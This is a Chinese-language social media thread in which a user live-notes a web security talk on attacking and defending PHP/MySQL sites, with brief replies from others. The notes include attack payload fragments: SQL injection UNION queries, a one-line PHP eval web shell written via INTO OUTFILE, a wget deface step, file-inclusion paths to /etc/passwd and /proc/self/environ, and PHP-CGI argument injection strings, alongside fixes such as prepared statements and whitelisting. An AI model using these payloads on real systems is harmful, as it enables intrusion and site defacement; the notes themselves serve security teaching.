tsung 正在
11 years ago
矛盾大對決
latest #47
Tombear
11 years ago
干擾你作筆記 XD
tsung
11 years ago
立即下載
tsung
11 years ago
我絕對能入侵你的網站 - 我的網站絕對不會被入侵
tsung
11 years ago
union select select 1,2,3
tsung
11 years ago
select 1.user(),3
tsung
11 years ago
select 1.username,password from ...
tsung
11 years ago
tsung
11 years ago
into outfile '/var/www/a.php' lines terminated by '<?php eval($_POST["cmd"]); ?>'
tsung
11 years ago
cmd="wget ...." 改首頁
tsung
11 years ago
mysql - /**/, %09, %0D, %A0, ()
tsung
11 years ago
select 'foo' = select 0x666f6f
tsung
11 years ago
XSS 劫持 window.onload
tsung
11 years ago
xss -> login -> 改首頁
tsung
11 years ago
使用 Prepared Statements 修正 SQL Injection
tsung
11 years ago
mysql_real_escape_string() 必須要使用 UTF-8
tsung
11 years ago
XSS - 任何輸入、輸出值都不可信任
tsung
11 years ago
OWASP Cross Site Scripting Prevention Cheat Sheet www.owasp.org/index.php/...
tsung
11 years ago
使用白名單, 而不是黑名單過濾.
tsung
11 years ago
$(phpinfo()}
tsung
11 years ago
"root ${eval($_POST[cmd])}";
tsung
11 years ago
@ eval
tsung
11 years ago
@ phpinfo
tsung
11 years ago
Double Quote Evaluation 設定檔使用 Single Quote 而非 Double Quote
tsung
11 years ago
\'
tsung
11 years ago
module=login, ./login.php%00
tsung
11 years ago
../../../etc/passwd%00
tsung
11 years ago
上傳圖片, access.log 先寫入, 再去 include access.log
tsung
11 years ago
/proc/self/environ
tsung
11 years ago
User-Agent: <?php@ phpinfo();?>
tsung
11 years ago
/proc/self/environ%00
tsung
11 years ago
Local File Inclusion
tsung
11 years ago
指定 module 白名單.
tsung
11 years ago
PHP-CGI argument injection
tsung
11 years ago
index.php?-s
tsung
11 years ago
php-cgi -s index.php
tsung
11 years ago
顯示 source code
tsung
11 years ago
index.php?-d+allow_url_include%3dOn ...
tsung
11 years ago
只能更新 php-cgi 版本, 將 .htaccess 把 - 過濾掉.
tsung
11 years ago
RewriteCond %{QUERY_STRING} ^(%2d|\-)[^=]+$ [NC]
最後到底是怎麼進去的XD 完全沒有輸入點吧XD
debɐnchery
11 years ago
Pichubaby: 應該是把網頁規則 rewrite 掉?
阿? .htaccess?
Allen Own
11 years ago
最後的 demo 細節就不揭露了,所以弄比較快 :-P
該不會問題是出在varnish上吧?
back to top